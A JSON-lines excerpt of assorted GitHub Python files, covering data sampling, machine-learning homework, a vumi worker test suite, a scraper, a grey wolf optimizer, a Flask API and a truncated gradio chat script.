+{"seq_id":"40745606962","text":"## Program to take rows and columns within values less than 500\n\nele = []\nfilelink = open(\"D:\\Btech\\SEM5\\Design and Analysis of Algorithms\\Project\\Data-Structures-and-Algorithms\\Graph based Email suggestion\\Email-EuAll.txt\",\"r\")\n#V = len(filelink.readlines())\nV = 420045\nfile_line = filelink.readline()\n# use the readline() method to read further.\n# If the file is not empty keep reading one line at a time, till the file is empty\nwhile file_line:\n #str.split() method is used split the string into a list of strings.\n numlist = [int(ele) for ele in file_line.split('\\t')]\n ele.append([numlist[0],numlist[1]])\n #print(numlist)\n #use realine() to read next line\n file_line = filelink.readline()\nfilelink.close()\n\nimport numpy as np\nimport pandas as pd\ndf = pd.DataFrame(ele)\nprint(df.head(10))\ndf.columns = ['src', 'dst']\nprint(df.dtypes)\n\ndf2 = df[(df['src'] < 500)]\ndf3 = df2[(df2['dst'] < 500)]\nprint(len(df2), len(df3))\ndf3.to_csv(\"D:\\Btech\\SEM5\\Design and Analysis of Algorithms\\Project\\Data-Structures-and-Algorithms\\Graph based Email suggestion\\email500.csv\")","repo_name":"dharaneishvc/Data-Structures-and-Algorithms","sub_path":"Graph based Email suggestion/filesampling.py","file_name":"filesampling.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9655576881","text":"from abc import abstractmethod\n\nimport numpy as np\n\n\ndef main():\n print(\"Which learning algorithm do you want to use?\")\n print(\" 1. Linear Regression\")\n print(\" 2. k-NN\")\n aType = int(input(\"Enter the number: \"))\n if aType == 1:\n ml = LinearRegression()\n else:\n ml = KNN()\n fileName = input(\"Enter the file name of training data: \")\n ml.setData('train', fileName)\n fileName = input(\"Enter the file name of test data: \")\n ml.setData('test', fileName)\n ml.buildModel()\n ml.testModel()\n ml.report()\n\n\nclass ML:\n def __init__(self):\n self._trainDX = np.array([]) # Feature value matrix (training data)\n self._trainDy = np.array([]) # Target column (training data)\n self._testDX = np.array([]) # Feature value matrix (test data)\n self._testDy = np.array([]) # Target column (test data)\n self._testPy = np.array([]) # Predicted values for test data\n self._rmse = 0 # Root mean squared error\n\n def setData(self, dtype, fileName): # set class variables\n XArray, yArray = self.createMatrices(fileName)\n if dtype == 'train':\n self._trainDX = XArray\n self._trainDy = yArray\n elif dtype == 'test':\n self._testDX = XArray\n self._testDy = yArray\n self._testPy = np.zeros(np.size(yArray)) # Initialize to all 0\n\n def createMatrices(self, fileName): # Read data from file and make arrays\n infile = open(fileName, 'r')\n XSet = []\n ySet = []\n for line in infile:\n data = [float(x) for x in line.split(',')]\n features = data[0:-1]\n target = data[-1]\n XSet.append(features)\n ySet.append(target)\n infile.close()\n XArray = np.array(XSet)\n yArray = np.array(ySet)\n return XArray, yArray\n\n @abstractmethod\n def buildModel(self):\n pass\n\n def testModel(self): # Test model with the test set\n n = np.size(self._testDy)\n for i in range(n):\n self._testPy[i] = self.predict(self._testDX[i])\n\n @abstractmethod\n def predict(self, data):\n pass\n\n def report(self):\n self.calcRMSE()\n print()\n print(\"RMSE: \", round(self._rmse, 2))\n\n def calcRMSE(self):\n n = np.size(self._testDy) # Number of test data\n totalSe = 0\n for i in range(n):\n se = (self._testDy[i] - self._testPy[i]) ** 2\n totalSe += se\n self._rmse = np.sqrt(totalSe / n)\n return self._rmse\n\n\nclass LinearRegression(ML):\n def __init__(self):\n super(LinearRegression, self).__init__()\n self._w = np.array([]) # Optimal weights for linear regression\n\n def buildModel(self):\n self._w = self.linearRegression()\n\n def linearRegression(self): # Do linear regression and return optimal w\n X = self._trainDX\n n = np.size(self._trainDy)\n X0 = np.ones([n, 1])\n nX = np.hstack((X0, X)) # Add a column of all 1's as the first column\n y = self._trainDy\n t_nX = np.transpose(nX)\n return np.dot(np.dot(np.linalg.inv(np.dot(t_nX, nX)), t_nX), y)\n\n def predict(self, data): # Apply linear regression to a test data\n nData = np.insert(data, 0, 1)\n return np.inner(self._w, nData)\n\n\nclass KNN(ML):\n def __init__(self, k=0):\n super(KNN, self).__init__()\n self._k = k # k value for k-NN\n\n def buildModel(self):\n if self._k == 0:\n self._k = int(input(\"Enter the value for k: \"))\n\n ### Implement the following and other necessary methods\n def predict(self, query):\n # 거리 계산\n distance = np.sum((np.array(self._trainDX) - query) ** 2, axis=1)\n pos = [[i, distance[i]] for i in range(len(self._trainDX))]\n # 선택\n pos.sort(key=lambda x: x[1])\n pos = pos[:self._k]\n # 평균\n return np.mean([self._trainDy[it[0]] for it in pos])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LeeSeungYun1020/AI_Programming_CB35655","sub_path":"hw/learning_experiments/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23294546627","text":"from twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import (Deferred, DeferredList,\n inlineCallbacks, returnValue)\n\nimport MySQLdb\nfrom pymongo import MongoClient\n\nfrom vumi.multiworker import MultiWorker\nfrom vumi.message import TransportUserMessage\nfrom vumi.tests.utils import StubbedWorkerCreator, get_stubbed_worker\n#from vumi.tests.test_multiworker import ToyWorker\nfrom vumi.tests.helpers import VumiTestCase, WorkerHelper, MessageHelper\nfrom vumi.service import Worker\n\nfrom vusion import VusionMultiWorker, DialogueWorker\nfrom vusion.persist import ProgramManager\n\nfrom tests.utils import MessageMaker, DataLayerUtils\n\n\nclass ToyWorker(Worker):\n events = []\n\n def __init__(self, *args):\n self._d = Deferred()\n return super(ToyWorker, self).__init__(*args)\n\n @inlineCallbacks\n def startWorker(self):\n self.events.append(\"START: %s\" % self.name)\n self.pub = yield self.publish_to(\"%s.outbound\" % self.name)\n yield self.consume(\"%s.inbound\" % self.name, self.process_message,\n message_class=TransportUserMessage)\n self._d.callback(None)\n\n def stopWorker(self):\n self.events.append(\"STOP: %s\" % self.name)\n\n def process_message(self, message):\n return self.pub.publish_message(\n message.reply(''.join(reversed(message['content']))))\n\n\nclass ToyDialogueWorker(DialogueWorker):\n \n def __init__(self, *args):\n self._d = Deferred()\n return super(ToyDialogueWorker, self).__init__(*args)\n \n def setup_application(self):\n super(ToyDialogueWorker, self).setup_application()\n self._d.callback(None)\n\n def teardown_application(self):\n super(ToyDialogueWorker, self).teardown_application()\n\n def before_teardown_application(self):\n super(ToyDialogueWorker, self).before_teardown_application()\n\n\nclass StubbedVusionMultiWorker(VusionMultiWorker):\n\n def WORKER_CREATOR(self, options):\n worker_creator = StubbedWorkerCreator(options)\n worker_creator.broker = self._amqp_client.broker\n return worker_creator\n\n def wait_for_workers(self):\n return DeferredList([w._d for w in self.workers.values()])\n\n\nclass VusionMultiWorkerTestCase(VumiTestCase, MessageMaker):\n timeout = 100\n\n base_config = {\n 'application_name': 'vusion',\n 'vusion_database_name': 'test3',\n 'mongodb_host': 'localhost',\n 'mongodb_port': 27017,\n 'mysql_host': '127.0.0.1',\n 'mysql_port': 3306,\n 'mysql_user': 'cake_test',\n 'mysql_password': 'password',\n 'mysql_db': 'vusion_test',\n 'dispatcher_name': 'dispatcher',\n 'workers': {\n 'worker1': '%s.ToyDialogueWorker' % (__name__,) },\n 'worker1': {\n 'control_name': 'test1',\n 'transport_name': 'test1',\n 'database_name': 'test1'},\n 'defaults': {\n 'mongodb_host': 'localhost',\n 'mongodb_port': 27017,\n 'dispatcher_name': 'dispatcher',\n 'vusion_database_name': 'test3'}\n }\n\n worker1_config = {\n 'control_name': 'test1url',\n 'transport_name': 'test1',\n 'database_name': 'test1',\n }\n\n new_worker_config = {\n 'control_name': 'test2url',\n 'transport_name': 'test2',\n 'database_name': 'test2',\n }\n\n def setUp(self):\n self.worker_helper = self.add_helper(WorkerHelper())\n self.message_helper = self.add_helper(MessageHelper())\n\n self.application_name = self.base_config['application_name']\n\n self.mongo_client = MongoClient(w=1)\n self.mysql_client = MySQLdb.connect(\n host='127.0.0.1',\n port=3306,\n user='cake_test',\n passwd='password',\n db='vusion_test')\n self.cleanData()\n\n db = self.mongo_client[self.base_config['vusion_database_name']]\n self.collections = {}\n self.collections['worker_config'] = db['workers']\n\n self.collections['workers'] = ProgramManager(self.mysql_client)\n query = \"\"\"CREATE TABLE programs (name VARCHAR(20), url VARCHAR(20),\"\"\" + \\\n \"\"\"`database` VARCHAR(20), status VARCHAR(20));\"\"\"\n c = self.mysql_client.cursor()\n c.execute(query)\n self.mysql_client.commit()\n c.close()\n\n\n @inlineCallbacks\n def tearDown(self):\n #yield self.worker.teardown_application()\n yield self.worker.stopService()\n yield super(VusionMultiWorkerTestCase, self).tearDown()\n self.cleanData()\n self.mysql_client.close()\n self.mongo_client.close()\n\n def cleanData(self):\n self.mongo_client.drop_database('test1')\n self.mongo_client.drop_database('test2')\n self.mongo_client.drop_database('test3')\n self.mongo_client.drop_database(self.base_config['vusion_database_name'])\n c = self.mysql_client.cursor()\n c.execute(\"\"\"DROP TABLE IF EXISTS programs;\"\"\")\n self.mysql_client.commit()\n c.close()\n\n def dispatch_control(self, control):\n return self.worker_helper.dispatch_raw('.'.join([self.application_name, 'control']), control)\n\n @inlineCallbacks\n def get_multiworker(self, config):\n self.worker = yield self.worker_helper.get_worker(\n StubbedVusionMultiWorker, config, start=True)\n yield self.worker.wait_for_workers()\n returnValue(self.worker)\n\n @inlineCallbacks\n def test_add_remove_workers(self):\n\n yield self.get_multiworker(self.base_config)\n\n self.assertEqual(self.collections['worker_config'].count(), 1)\n\n control = self.mkmsg_multiworker_control(\n message_type='add_worker',\n worker_name='worker2',\n worker_class= '%s.ToyDialogueWorker' % (__name__,),\n config=self.new_worker_config)\n yield self.dispatch_control(control)\n\n yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 2)\n self.assertTrue('worker2' in self.worker.workers)\n\n control = self.mkmsg_multiworker_control(\n message_type='add_worker',\n worker_name='worker2',\n worker_class= '%s.ToyDialogueWorker' % (__name__,),\n config=self.new_worker_config)\n yield self.dispatch_control(control)\n\n #yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 2)\n self.assertTrue('worker2' in self.worker.workers)\n\n control = self.mkmsg_multiworker_control(\n message_type='remove_worker',\n worker_name='worker2')\n yield self.dispatch_control(control)\n\n #yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 1)\n self.assertFalse('worker2' in self.worker.workers)\n \n #yield self.worker.stopService()\n\n @inlineCallbacks\n def test_startup(self):\n #The worker1 class and config store in the database are overwrite\n #by the config file\n self.collections['worker_config'].save({\n 'name': 'worker1',\n 'class': '%s.ToyWorker' % (__name__),\n 'config': self.worker1_config})\n\n self.collections['worker_config'].save({\n 'name': 'worker2',\n 'class': '%s.ToyWorker' % (__name__),\n 'config': self.new_worker_config})\n\n c = self.mysql_client.cursor()\n c.executemany(\n \"\"\"INSERT INTO programs (name, url, status, `database`) \"\"\" + \\\n \"\"\"VALUES (%s,%s,%s,%s);\"\"\",\n [\n ('my program','test2url','running', 'test2')\n ])\n self.mysql_client.commit()\n c.close()\n\n yield self.get_multiworker(self.base_config)\n yield self.worker.wait_for_workers()\n\n self.assertEqual(self.collections['worker_config'].count(), 2)\n worker_configs = self.collections['worker_config'].find()\n self.assertEqual(\n worker_configs[0]['class'],\n '%s.ToyDialogueWorker' % (__name__))\n self.assertEqual(worker_configs[0]['model-version'], '2')\n\n self.assertEqual(\n worker_configs[1]['class'],\n '%s.ToyWorker' % (__name__))\n\n self.assertTrue('worker1' in self.worker.workers)\n self.assertTrue(isinstance(self.worker.workers['worker1'],\n DialogueWorker))\n self.assertTrue('worker2' in self.worker.workers)\n self.assertTrue(isinstance(self.worker.workers['worker2'],\n ToyWorker))\n","repo_name":"texttochange/vusion-backend","sub_path":"vusion/tests/test_multiworker.py","file_name":"test_multiworker.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"39931602138","text":"import os\nimport logging\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# logging.basicConfig(level = logging.INFO,format = '%(asctime)s -%(levelname)s:%(message)s')\t#配置信息\n\ndir = os.path.dirname(__file__)\nhandler = logging.FileHandler(r\"{}/log.log\".format(dir),encoding='utf-8')\t#指明文件\nhandler.setLevel(logging.INFO)\t\t\t #设置打印到文件的消息等级\n\nformatter = logging.Formatter('%(asctime)s -%(levelname)s:%(message)s')\nhandler.setFormatter(formatter)\t\t\t #设置打印到文件的配置信息\n\nlogger.addHandler(handler)","repo_name":"Freedomisgood/SeverChan_Nyedu","sub_path":"logfile.py","file_name":"logfile.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74460416893","text":"import requests\nimport time\nimport config\nfrom Scrapers import vuokraoviScraper\n\n\ndef do_scrape():\n data = []\n pages_count = 5\n max_entries_per_page = 5000\n fetch_interval_s = 60\n for page in range(1, pages_count + 1):\n print(f'scraping page {page} with {max_entries_per_page} max entries...')\n new_entries = vuokraoviScraper.scrape_website(page, max_entries_per_page)\n data.extend(new_entries)\n print(f'scraped {len(new_entries)} new entries (total {len(data)}). Sleeping for {fetch_interval_s}s...')\n if len(new_entries is not max_entries_per_page):\n time.sleep(fetch_interval_s)\n return data\n\n\ndef query_api_text(api_url, cookies) -> str:\n return requests.get(api_url, headers=config.common_request_headers, cookies=cookies).text\n\n\ndef query_api_text_minified(api_url, cookies) -> str:\n response = query_api_text(api_url, cookies)\n return minify_string(response)\n\n\ndef minify_string(to_minimize) -> str:\n return to_minimize.replace(config.scrapeService_NON_BREAK_SPACE_CHAR, '').replace('\\n', ' ').replace('\\r', '').replace(' ', '').replace(' ,', ',')\n","repo_name":"japsuu/AsunnotKartalla","sub_path":"Services/scrapeService.py","file_name":"scrapeService.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42431916790","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[2]:\n\n\nenglish_score = np.array([55, 89, 76, 65, 48, 70])\nmath_score = np.array([60, 85, 60, 68, 55, 60])\nchinese_score = np.array([65, 90, 82, 72, 66, 77])\n\n\n# In[11]:\n\n\na = np.greater(english_score, math_score)\nnp.sum(a!=0)\n\n\n# In[15]:\n\n\nb = np.logical_and(chinese_score > english_score, chinese_score > math_score) \nc = np.all(b)\nc\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kenny51104/exercise11","sub_path":"Untitled8.py","file_name":"Untitled8.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39028491132","text":"import tkinter as tk\r\nfrom estructurasLineales.pila import Pila\r\n\r\n# Create the main window\r\nroot = tk.Tk()\r\n\r\n# Set the window title\r\nroot.title(\"Python GUI - TEST\")\r\n\r\n# Set the window dimensions\r\nroot.geometry(\"600x500\")\r\n\r\nusername = tk.StringVar()\r\npila= Pila()\r\npila.push('Iñigo')\r\npila.push(14)\r\npila.push(5)\r\n\r\n\r\n\r\ndef submit():\r\n print(username.get())\r\n if username.get():\r\n tk.Label(root, text=username.get()).pack()\r\n else:\r\n tk.Label(root, text=pila.display()).pack()\r\n \r\n username.set(\"\")\r\n\r\n\r\n# Create a Label widget\r\ntk.Label(root, text=\"Hello, world!\").pack()\r\n\r\ntk.Button(root, text=\"Click me!\", command = submit).pack() \r\ntk.Checkbutton(root).pack() \r\n\r\n\r\ntk.Entry(justify=tk.LEFT, textvariable=username).pack()\r\n\r\n\r\n\r\n# Pack the Label widget to display it on the window\r\n# label.pack()\r\n\r\n# Start the main event loop\r\nroot.mainloop()\r\n\r\n\r\n\r\n\r\n","repo_name":"Inigo1405/EstructuraDatosAdv-Verano-2023","sub_path":"pythonGUI.py","file_name":"pythonGUI.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42674538652","text":"a=open(\"rank.txt\",\"r\")\nb=a.readlines()\nsquares=[]\nfor i in range(len(b)):\n c=(b[i])\n my_list=(c.split())\n mynewlist = [s for s in my_list if s.isdigit()]\n if mynewlist[3]==\"11\":\n d=mynewlist[2]\n squares.append(int(d))\nprint(sorted(squares)) \n","repo_name":"pratyush201102/Python-","sub_path":"IOE.py","file_name":"IOE.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7517537914","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport math\nfrom sklearn import svm\nfrom sklearn import model_selection, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport numpy.random as rd\nimport matplotlib.pyplot as plt\n\n\n# 适应度函数\n# Sphere测试函数[-100,100]\ndef sphere(position):\n total = 0\n for i in range(len(position)):\n total += position[i] ** 2\n return total\n\n\n# Ackley测试函数[-32,32]\ndef ackley(position):\n a = 20\n b = 0.2\n c = 2.0 * math.pi\n firstSum = 0.0\n secondSum = 0.0\n for i in range(len(position)):\n firstSum += position[i] ** 2.0\n secondSum += math.cos(c * position[i])\n n = float(len(position))\n f = -a * math.exp(-b * math.sqrt(firstSum / n)) - math.exp(secondSum / n) + a + math.e\n return f\n\n\n# rastrigin测试函数[-5.12,5.12]\ndef Rastrigin(position):\n A = 10.0\n total = 0\n for i in range(len(position)):\n total += position[i] ** 2 - A * math.cos(2 * math.pi * position[i]) + A\n return total\n\n\n# rosenbrock测试函数[-30,30]\ndef Rosenbrock(position):\n a = 100.0\n total = 0\n for i in range(len(position)-1):\n total += a*(position[i+1] - position[i] * position[i])**2 + (position[i]-1)*(position[i]-1)\n return total\n\n\n# 生成tent混沌序列\ndef tentmap12(alpha, x0, max_g):\n \"\"\"\n tent map 函数\n :param alpha:0到1之间的参数\n :param x0: 初值\n :param max_g: 迭代次数\n :return: 函数值\n \"\"\"\n x = x0\n x_list = []\n for i in max_g:\n if x < alpha:\n x = x / alpha\n else:\n x = (1 - x) / (1 - alpha)\n x_list.append(x)\n return x_list\n\n# 超过搜索空间,边界处理\ndef relocation(loc, lb, ub):\n if loc > ub:\n loc = ub\n if loc < lb:\n loc = lb\n return loc\n\n# 3. GWO优化算法\ndef IGWO(fitfunc,SearchAgents_no, Max_iteration, dim, lb, ub):\n # 初始化头狼的位置\n Alpha_pos = np.zeros((SearchAgents_no,dim))\n Beta_pos = np.zeros((SearchAgents_no,dim))\n Delta_pos = np.zeros((SearchAgents_no,dim))\n # 初始化Alpha狼的目标函数值\n Alpha_score = float(\"inf\")\n Beta_score = float(\"inf\")\n Delta_score = float(\"inf\")\n\n # TO DO tent映射生成初始种群\n max_g = np.linspace(1, SearchAgents_no, num=SearchAgents_no)\n # 生成tent序列 30维度\n x_list = np.zeros((dim, SearchAgents_no))\n tent = np.zeros((SearchAgents_no, dim))\n for i in range(0, dim):\n x_list[i] = tentmap12(0.6, rd.random(1), max_g)\n for i in range(0, SearchAgents_no):\n for j in range(0, dim):\n tent[i,j] = x_list[j,i]\n Positions = np.dot(tent, (ub - lb)) + lb\n # Positions = np.dot(rd.rand(SearchAgents_no, dim), (ub - lb)) + lb # 初始化首次搜索位置\n print('-------')\n\n iterations = []\n f = []\n\n # 主循环\n index_iteration = 0\n while index_iteration < Max_iteration:\n\n # 遍历每个狼\n for i in range(0, SearchAgents_no):\n # 若搜索位置超过了搜索空间,需要重新回到搜索空间\n for j in range(0, dim):\n Positions[i, j] = relocation(Positions[i, j], lb, ub)\n scores = fitfunc(Positions[i])\n # fitness = (1 - scores) * 100\n fitness = scores\n if fitness < Alpha_score: # 如果目标函数值小于Alpha狼的目标函数值\n Alpha_score = fitness # 则将Alpha狼的目标函数值更新为最优目标函数值\n Alpha_pos = Positions[i] # 同时将Alpha狼的位置更新为最优位置\n if fitness > Alpha_score and fitness < Beta_score: # 如果目标函数值介于于Alpha狼和Beta狼的目标函数值之间\n Beta_score = fitness # 则将Beta狼的目标函数值更新为最优目标函数值\n Beta_pos = Positions[i]\n if fitness > Alpha_score and fitness > Beta_score and fitness < Delta_score: # 如果目标函数值介于于Beta狼和Delta狼的目标函数值之间\n Delta_score = fitness # 则将Delta狼的目标函数值更新为最优目标函数值\n Delta_pos = Positions[i]\n\n # TO DO 收敛因子改进\n # m=rd.random(1)\n # a = 2 *((1-index_iteration / Max_iteration)**m)\n # a = 2 - 2 * (index_iteration / Max_iteration)\n a = 2 - 2 * (index_iteration / Max_iteration)**2\n\n # 遍历每个狼\n for i in range(0, SearchAgents_no):\n # 遍历每个维度\n for j in range(0, dim):\n # 包围猎物,位置更新\n r1 = rd.random(1) # 生成0~1之间的随机数\n r2 = rd.random(1)\n A1 = 2 * a * r1 - a # 计算系数A\n C1 = 2 * r2 # 计算系数C\n\n # Alpha狼位置更新\n D_alpha = abs(C1 * Alpha_pos[j] - Positions[i, j])\n X1 = Alpha_pos[j] - A1 * D_alpha\n\n r1 = rd.random(1)\n r2 = rd.random(1)\n\n A2 = 2 * a * r1 - a\n C2 = 2 * r2\n\n # Beta狼位置更新\n D_beta = abs(C2 * Beta_pos[j] - Positions[i, j])\n X2 = Beta_pos[j] - A2 * D_beta\n\n r1 = rd.random(1)\n r2 = rd.random(1)\n\n A3 = 2 * a * r1 - a\n C3 = 2 * r2\n\n # Delta狼位置更新\n D_delta = abs(C3 * Delta_pos[j] - Positions[i, j])\n X3 = Delta_pos[j] - A3 * D_delta\n\n # 位置更新\n Positions[i, j] = (X1 + X2 + X3) / 3\n # Positions[i, j] = (5 * X1 + 3 * X2 + 2 * X3) / 10\n\n # TO DO差分进化\n # 交叉\n # Wmax = 1.5\n # Wmin = 0.25\n # W = (Wmax - Wmin) * (Max_iteration - index_iteration) / Max_iteration + Wmin\n W = 0.5\n V = Alpha_pos + W * (Beta_pos - Delta_pos)\n # 变异\n CR = 0.4 # 交叉概率常数\n U = [[0 for i in range(dim)] for i in range(SearchAgents_no)]\n for i in range(0, SearchAgents_no):\n for j in range(0, dim):\n # 判断变异是否满足边界\n V[j] = relocation(V[j], lb, ub)\n # 更新狼的位置边界处理\n Positions[i, j] = relocation(Positions[i, j], lb, ub)\n rand_j = rd.randint(0, dim - 1)\n rand_float = rd.random()\n if rand_float <= CR or rand_j == j:\n U[i][j] = V[j]\n else:\n U[i][j] = Positions[i, j]\n # 选择\n for i in range(0, SearchAgents_no):\n # 重计算适应度函数\n x_score = fitfunc(Positions[i])\n u_score = fitfunc(U[i])\n if u_score <= x_score:\n Positions[i] = U[i]\n\n index_iteration = index_iteration + 1\n iterations.append(index_iteration)\n # accuracy.append((100 - Alpha_score) / 100)\n f.append(Alpha_score)\n print('----------------迭代次数--------------------' + str(index_iteration))\n print('f:' + str(Alpha_score))\n\n return iterations, f\n\n\ndef GWO(fitfunc, SearchAgents_no, Max_iteration, dim, lb, ub):\n # 初始化头狼的位置\n Alpha_pos = np.zeros((SearchAgents_no,dim))\n Beta_pos = np.zeros((SearchAgents_no,dim))\n Delta_pos = np.zeros((SearchAgents_no,dim))\n\n # 初始化Alpha狼的目标函数值\n Alpha_score = float(\"inf\")\n Beta_score = float(\"inf\")\n Delta_score = float(\"inf\")\n\n # 初始化首次搜索位置\n Positions = np.dot(rd.rand(SearchAgents_no, dim), (ub - lb)) + lb\n print(Positions)\n print('-------')\n\n iterations = []\n f = []\n\n # 主循环\n index_iteration = 0\n while index_iteration < Max_iteration:\n\n # 遍历每个狼\n for i in range(0, SearchAgents_no):\n # 若搜索位置超过了搜索空间,需要重新回到搜索空间\n for j in range(0, dim):\n Positions[i, j] = relocation(Positions[i, j], lb, ub)\n scores = fitfunc(Positions[i])\n # fitness = (1 - scores) * 100\n fitness = scores\n if fitness < Alpha_score: # 如果目标函数值小于Alpha狼的目标函数值\n Alpha_score = fitness # 则将Alpha狼的目标函数值更新为最优目标函数值\n Alpha_pos = Positions[i] # 同时将Alpha狼的位置更新为最优位置\n if fitness > Alpha_score and fitness < Beta_score: # 如果目标函数值介于于Alpha狼和Beta狼的目标函数值之间\n Beta_score = fitness # 则将Beta狼的目标函数值更新为最优目标函数值\n Beta_pos = Positions[i]\n if fitness > Alpha_score and fitness > Beta_score and fitness < Delta_score: # 如果目标函数值介于于Beta狼和Delta狼的目标函数值之间\n Delta_score = fitness # 则将Delta狼的目标函数值更新为最优目标函数值\n Delta_pos = Positions[i]\n\n # a = 2 - 2 * (index_iteration / Max_iteration)\n a = 2 - 2 * (index_iteration / Max_iteration)**2\n # m = rd.random(1)\n # a = 2 * ((1 - index_iteration / Max_iteration) ** m)\n # 遍历每个狼\n for i in range(0, SearchAgents_no):\n # 遍历每个维度\n for j in range(0, dim):\n # 包围猎物,位置更新\n r1 = rd.random(1) # 生成0~1之间的随机数\n r2 = rd.random(1)\n A1 = 2 * a * r1 - a # 计算系数A\n C1 = 2 * r2 # 计算系数C\n\n # Alpha狼位置更新\n D_alpha = abs(C1 * Alpha_pos[j] - Positions[i, j])\n X1 = Alpha_pos[j] - A1 * D_alpha\n\n r1 = rd.random(1)\n r2 = rd.random(1)\n\n A2 = 2 * a * r1 - a\n C2 = 2 * r2\n\n # Beta狼位置更新\n D_beta = abs(C2 * Beta_pos[j] - Positions[i, j])\n X2 = Beta_pos[j] - A2 * D_beta\n\n r1 = rd.random(1)\n r2 = rd.random(1)\n\n A3 = 2 * a * r1 - a\n C3 = 2 * r2\n\n # Delta狼位置更新\n D_delta = abs(C3 * Delta_pos[j] - Positions[i, j])\n X3 = Delta_pos[j] - A3 * D_delta\n\n # 位置更新\n Positions[i, j] = (X1 + X2 + X3) / 3\n\n index_iteration = index_iteration + 1\n iterations.append(index_iteration)\n f.append(Alpha_score)\n print('----------------迭代次数--------------------' + str(index_iteration))\n print('f:' + str(Alpha_score))\n return iterations, f\n\n\ndef plot(iterations, mse):\n plt.plot(iterations, mse,c='green')\n plt.xlabel('iteration', size=14)\n plt.ylim(0,10000)\n plt.ylabel('best score', size=10)\n plt.title('GWO')\n plt.show()\n\n\nif __name__ == '__main__':\n print('----------------.参数设置------------')\n SearchAgents_no = 30 # 狼群数量\n Max_iteration = 500 # 最大迭代次数\n dim = 30 # 维度\n lb = -30 # 参数取值下界\n ub = 30 # 参数取值上界\n\n print('----------------3.GWO-----------------')\n # iterations, f = GWO(sphere,SearchAgents_no, Max_iteration, dim, lb, ub)\n # Iiterations, If = IGWO(Rastrigin, SearchAgents_no, Max_iteration, dim, lb, ub)\n print('----------------4.结果显示-----------------')\n # plt.plot(iterations, f)\n # plt.plot(Iiterations, If, c='green')\n # # plt.xlabel('iteration', size=14)\n # # plt.ylim(0, 20)\n # # plt.ylabel('best score', size=10)\n # # plt.title('GWO')\n # # plt.show()\n fit_g = []\n for i in range(30):\n iterations, f = IGWO(Rosenbrock,SearchAgents_no, Max_iteration, dim, lb, ub)\n fit_g.append(f[-1])\n fig_mean = np.mean(fit_g)\n fig_std = np.std(fit_g, ddof=1)\n print(\"最优值为:%f\" % min(fit_g))\n print(\"平均值为:%f\" % fig_mean)\n print(\"最差值为:%f\" % max(fit_g))\n print(\"标准差为:%f\" % fig_std)\n print(min(fit_g))\n print(fig_mean)\n print(max(fit_g))\n print(fig_std)\n print(fit_g)\n\n\n\n\n","repo_name":"zjq222xwj/SVM-optimize","sub_path":"testFunc.py","file_name":"testFunc.py","file_ext":"py","file_size_in_byte":12284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17035040301","text":"#!/usr/bin/env python\n# author = 'ZZH'\n# time = 2022/11/13\n# project = leetcode6234-最小公倍数为K的子数组数目\nimport math\nfrom typing import List\n\n\nclass Solution:\n def subarrayLCM(self, nums: List[int], k: int) -> int:\n ans = 0\n for i in range(len(nums)):\n num = nums[i]\n for j in range(i, len(nums)):\n if num % nums[j] != 0:\n num = math.lcm(num, nums[j])\n if num == k:\n ans += 1\n if num > k:\n break\n return ans\n","repo_name":"ZZHbible/leetcode","sub_path":"319周赛前三题/leetcode6234-最小公倍数为K的子数组数目.py","file_name":"leetcode6234-最小公倍数为K的子数组数目.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73671399931","text":"#write a flask API which can return square of a number \nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n@app.route('/',methods=[\"GET\"])\ndef home_page():\n message = \"Hello , I am learning development of API in GCP \"\n response = {'my_response':message}\n return jsonify(response)\n\n@app.route(\"/calculate/\",methods=[\"GET\"])\ndef calculate_square(num):\n response = {'Given number is ':num,\n 'Square of number':num**2}\n return jsonify(response)\n\nif __name__ == \"__main__\":\n app.run(debug=True,host=\"0.0.0.0\")","repo_name":"HSubbu/GCP-Exercises-repo","sub_path":"exercise-api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2388676318","text":"import gradio as gr\nimport copy\nimport time\nfrom datetime import datetime\nfrom argparse import ArgumentParser\nimport torch\nfrom transformers import (\n GenerationConfig\n)\nimport os\nfrom inference import Assistant\nwith open(\"model_identity.txt\", 'r', encoding='utf8') as f:\n model_identity = f.readlines()\n if model_identity:\n model_identity = model_identity[0].strip()\nmax_context_len = 2048\n\n\n\ndef count_history_len(history):\n sum = 0\n for turn in history:\n sum += len(turn[0])\n sum += 